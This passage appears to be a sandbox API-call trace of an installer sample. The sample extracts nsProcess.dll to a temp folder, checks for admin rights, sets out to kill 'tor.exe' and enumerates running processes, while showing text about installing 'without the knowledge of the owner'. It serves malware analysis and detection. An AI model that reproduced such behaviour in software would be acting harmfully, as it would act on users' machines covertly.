(hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x0 [0261.176] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x0 [0261.177] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x0, lParam=0x0) returned 0x1 [0261.177] MulDiv (nNumber=2, nNumerator=30000, nDenominator=60) returned 1000 [0261.177] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x3e8, lParam=0x0) returned 0x1f4 [0261.177] lstrcpynA (in: lpString1=0x42a048, lpString2="installation of the client without the knowledge of the owner.", iMaxLength=1024 | out: lpString1="installation of the client without the knowledge of the owner.") returned="installation of the client without the knowledge of the owner." [0261.178] lstrlenA (lpString="installation of the client without the knowledge of the owner.") returned 62 [0261.178] SetWindowTextA (hWnd=0x20324, lpString="installation of the client without the knowledge of the owner.") returned 1 [0261.179] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x1 [0261.179] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x1 [0261.180] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x1, lParam=0x0) returned 0x1 [0261.180] MulDiv (nNumber=3, nNumerator=30000, nDenominator=60) returned 1500 [0261.180] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x5dc, lParam=0x0) returned 0x3e8 [0261.180] lstrcpynA (in: lpString1=0x42a048, lpString2="We block suspicious accounts.", iMaxLength=1024 | out: lpString1="We block suspicious accounts.") returned="We block suspicious accounts." [0261.180] lstrlenA (lpString="We block suspicious accounts.") returned 29 [0261.180] SetWindowTextA (hWnd=0x20324, lpString="We block suspicious accounts.") returned 1 [0261.181] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x2 [0261.181] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x2 [0261.181] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x2, lParam=0x0) returned 0x1 [0261.183] MulDiv (nNumber=4, nNumerator=30000, nDenominator=60) returned 2000 [0261.183] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x7d0, lParam=0x0) returned 0x5dc [0261.184] lstrcpynA (in: lpString1=0x42a048, lpString2=" ", iMaxLength=1024 | out: lpString1=" ") returned=" " [0261.184] lstrlenA (lpString=" ") returned 1 [0261.184] SetWindowTextA (hWnd=0x20324, lpString=" ") returned 1 [0261.185] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x3 [0261.185] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x3 [0261.185] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x3, lParam=0x0) returned 0x1 [0261.185] MulDiv (nNumber=5, nNumerator=30000, nDenominator=60) returned 2500 [0261.185] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x9c4, lParam=0x0) returned 0x7d0 [0261.186] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Windows\\", iMaxLength=1024 | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0261.189] lstrlenA (lpString="C:\\Windows") returned 10 [0261.189] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Windows", iMaxLength=1024 | out: lpString1="C:\\Windows") returned="C:\\Windows" [0261.192] CreateDirectoryA (lpPathName="C:\\Windows" (normalized: "c:\\windows"), lpSecurityAttributes=0x0) returned 0 [0261.193] GetLastError () returned 0xb7 [0261.193] GetFileAttributesA (lpFileName="C:\\Windows" (normalized: "c:\\windows")) returned 0x10 [0261.193] lstrcpynA (in: lpString1=0x42a048, lpString2="Output folder: ", iMaxLength=1024 | out: lpString1="Output folder: ") returned="Output folder: " [0261.193] lstrlenA (lpString="Output folder: ") returned 15 [0261.193] lstrlenA (lpString="C:\\Windows") returned 10 [0261.193] lstrcatA (in: lpString1="Output folder: ", lpString2="C:\\Windows" | out: lpString1="Output folder: C:\\Windows") returned="Output folder: C:\\Windows" [0261.193] SetWindowTextA (hWnd=0x20324, lpString="Output folder: C:\\Windows") returned 1 [0261.194] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x4 [0261.195] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd68) returned 0x4 [0261.195] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x4, lParam=0x0) returned 0x1 [0261.195] lstrcpynA (in: lpString1=0x435800, lpString2="C:\\Windows", iMaxLength=1024 | out: lpString1="C:\\Windows") returned="C:\\Windows" [0261.195] SetCurrentDirectoryA (lpPathName="C:\\Windows" (normalized: "c:\\windows")) returned 1 [0261.196] MulDiv (nNumber=6, nNumerator=30000, nDenominator=60) returned 3000 [0261.196] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0xbb8, lParam=0x0) returned 0x9c4 [0261.197] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0261.197] lstrlenA (lpString="") returned 0 [0261.197] lstrcpynA (in: lpString1=0x40ac10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0261.197] lstrcpynA (in: lpString1=0x40b010, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0261.197] lstrcmpiA (lpString1="", lpString2="") returned 0 [0261.199] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0261.199] lstrlenA (lpString="") returned 0 [0261.199] lstrcpynA (in: lpString1=0x2aadcc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0261.199] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" [0261.202] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 36 [0261.202] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" [0261.202] GetTickCount () returned 0x1d5efd4 [0261.202] GetTempFileNameA (in: lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpPrefixString="nsa", uUnique=0x0, lpTempFileName=0x430000 | out: lpTempFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp")) returned 0xea97 [0261.205] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.205] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.205] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.206] lstrcpynA (in: lpString1=0x42bc70, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.206] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.206] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", lpFindFileData=0x42c0b8 | out: lpFindFileData=0x42c0b8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4afe8a0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0xc4afe8a0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0xc4afe8a0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8, cFileName="nsaEA97.tmp", cAlternateFileName="")) returned 0x287678 [0261.206] FindClose (in: hFindFile=0x287678 | out: hFindFile=0x287678) returned 1 [0261.206] DeleteFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp")) returned 1 [0261.207] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.207] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.207] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.208] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0261.208] GetLastError () returned 0xb7 [0261.208] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0261.208] CreateDirectoryA (lpPathName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpSecurityAttributes=0x0) returned 0 [0261.209] GetLastError () returned 0xb7 [0261.209] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj")) returned 0x10 [0261.209] CreateDirectoryA (lpPathName="C:\\Users\\KEECFM~1\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpSecurityAttributes=0x0) returned 0 [0261.209] GetLastError () returned 0xb7 [0261.209] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata")) returned 0x2012 [0261.209] CreateDirectoryA (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0261.210] GetLastError () returned 0xb7 [0261.210] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local")) returned 0x2010 [0261.210] CreateDirectoryA (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0261.210] GetLastError () returned 0xb7 [0261.210] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010 [0261.211] GetModuleHandleA (lpModuleName="SHELL32") returned 0x75cb0000 [0261.211] GetProcAddress (hModule=0x75cb0000, lpProcName=0x2a8) returned 0x75d044f5 [0261.211] IsUserAnAdmin () returned 1 [0261.211] CreateDirectoryA (lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp"), lpSecurityAttributes=0x2d6fbc4) returned 1 [0261.212] lstrcpynA (in: lpString1=0x42a048, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0261.212] lstrlenA (lpString="") returned 0 [0261.212] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.212] lstrcatA (in: lpString1="", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.212] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.212] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.212] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.212] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.212] lstrcpynA (in: lpString1=0x436800, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.213] lstrcpynA (in: lpString1=0x430000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0261.215] MulDiv (nNumber=7, nNumerator=30000, nDenominator=60) returned 3500 [0261.215] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0xdac, lParam=0x0) returned 0xbb8 [0261.215] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.216] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.216] lstrcpynA (in: lpString1=0x40b010, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" [0261.216] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" [0261.217] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsprocess.dll")) returned 0xffffffff [0261.217] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsprocess.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0261.217] lstrcpynA (in: lpString1=0x42a048, lpString2="Extract: ", iMaxLength=1024 | out: lpString1="Extract: ") returned="Extract: " [0261.218] lstrlenA (lpString="Extract: ") returned 9 [0261.218] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned 62 [0261.218] lstrcatA (in: lpString1="Extract: ", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" | out: lpString1="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" [0261.218] SetFilePointer (in: hFile=0x1e0, lDistanceToMove=61812, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf174 [0261.218] ReadFile (in: hFile=0x1e0, lpBuffer=0x2d6fdac, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x2d6fdac*, lpNumberOfBytesRead=0x2d6fd28*=0x4, lpOverlapped=0x0) returned 1 [0261.218] GetTickCount () returned 0x1d5efe3 [0261.218] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x631, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x631, lpOverlapped=0x0) returned 1 [0261.218] GetTickCount () returned 0x1d5efe3 [0261.218] MulDiv (nNumber=1585, nNumerator=100, nDenominator=1585) returned 100 [0261.219] wsprintfA (in: param_1=0x2d6fd44, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0261.219] lstrlenA (lpString="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned 71 [0261.219] lstrlenA (lpString="... 100%") returned 8 [0261.219] lstrcatA (in: lpString1="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll", lpString2="... 100%" | out: lpString1="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll... 100%") returned="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll... 100%" [0261.219] WriteFile (in: hFile=0x208, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1000, lpOverlapped=0x0) returned 1 [0261.220] CloseHandle (hObject=0x208) returned 1 [0261.221] MulDiv (nNumber=8, nNumerator=30000, nDenominator=60) returned 4000 [0261.221] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0xfa0, lParam=0x0) returned 0xdac [0261.293] MulDiv (nNumber=9, nNumerator=30000, nDenominator=60) returned 4500 [0261.293] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x1194, lParam=0x0) returned 0xfa0 [0261.294] lstrcpynA (in: lpString1=0x2aadcc, lpString2="tor.exe", iMaxLength=1024 | out: lpString1="tor.exe") returned="tor.exe" [0261.294] MulDiv (nNumber=10, nNumerator=30000, nDenominator=60) returned 5000 [0261.294] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x1388, lParam=0x0) returned 0x1194 [0261.294] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.295] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.295] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" [0261.296] lstrcpynA (in: lpString1=0x40a410, lpString2="_KillProcess", iMaxLength=1024 | out: lpString1="_KillProcess") returned="_KillProcess" [0261.296] GetModuleHandleA (lpModuleName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned 0x0 [0261.298] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll", hFile=0x0, dwFlags=0x8) returned 0x10000000 [0261.530] GetProcAddress (hModule=0x10000000, lpProcName="_KillProcess") returned 0x1000143e [0261.530] lstrcpynA (in: lpString1=0x10003000, lpString2="tor.exe", iMaxLength=1024 | out: lpString1="tor.exe") returned="tor.exe" [0261.531] GetVersionExA (in: lpVersionInformation=0x2d6fccc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x40a410, dwMinorVersion=0x2aadc8, dwBuildNumber=0x2500c4, dwPlatformId=0x10000000, szCSDVersion="D\x04") | out: lpVersionInformation=0x2d6fccc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0261.531] LoadLibraryA (lpLibFileName="NTDLL.DLL") returned 0x779e0000 [0261.531] GetProcAddress (hModule=0x779e0000, lpProcName="NtQuerySystemInformation") returned 0x779ffda0 [0261.531] LocalAlloc (uFlags=0x0, uBytes=0x4000) returned 0x2aadc8 [0261.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2aadc8, Length=0x4000, ResultLength=0x2d6fd60 | out: SystemInformation=0x2aadc8, ResultLength=0x2d6fd60*=0x10388) returned 0xc0000004 [0261.533] LocalFree (hMem=0x2aadc8) returned 0x0 [0261.533] LocalAlloc (uFlags=0x0, uBytes=0x8000) returned 0x2aadc8 [0261.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2aadc8, Length=0x8000, ResultLength=0x2d6fd60 | out: SystemInformation=0x2aadc8, ResultLength=0x2d6fd60*=0x10388) returned 0xc0000004 [0261.534] LocalFree (hMem=0x2aadc8) returned 0x0 [0261.534] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x2aadc8 [0261.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2aadc8, Length=0x10000, ResultLength=0x2d6fd60 | out: SystemInformation=0x2aadc8, ResultLength=0x2d6fd60*=0xc9f0) returned 0x0 [0261.536] FreeLibrary (hLibModule=0x779e0000) returned 1 [0261.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0261.536] lstrcmpiA (lpString1="System", lpString2="tor.exe") returned -1 [0261.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0261.536] lstrcmpiA (lpString1="smss.exe", lpString2="tor.exe") returned -1 [0261.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0261.536] lstrcmpiA (lpString1="csrss.exe", lpString2="tor.exe") returned -1 [0261.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0261.536] lstrcmpiA (lpString1="wininit.exe", lpString2="tor.exe") returned 1 [0261.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0261.536] lstrcmpiA (lpString1="csrss.exe", lpString2="tor.exe") returned -1 [0261.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0261.536] lstrcmpiA (lpString1="winlogon.exe", lpString2="tor.exe") returned 1 [0261.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0261.536] lstrcmpiA (lpString1="services.exe", lpString2="tor.exe") returned -1 [0261.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0261.536] lstrcmpiA (lpString1="lsass.exe", lpString2="tor.exe") returned -1 [0261.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsm.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsm.exe", lpUsedDefaultChar=0x0) returned 8 [0261.537] lstrcmpiA (lpString1="lsm.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.537] lstrcmpiA (lpString1="svchost.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.537] lstrcmpiA (lpString1="svchost.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.537] lstrcmpiA (lpString1="svchost.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.537] lstrcmpiA (lpString1="svchost.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.537] lstrcmpiA (lpString1="svchost.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.537] lstrcmpiA (lpString1="svchost.exe", 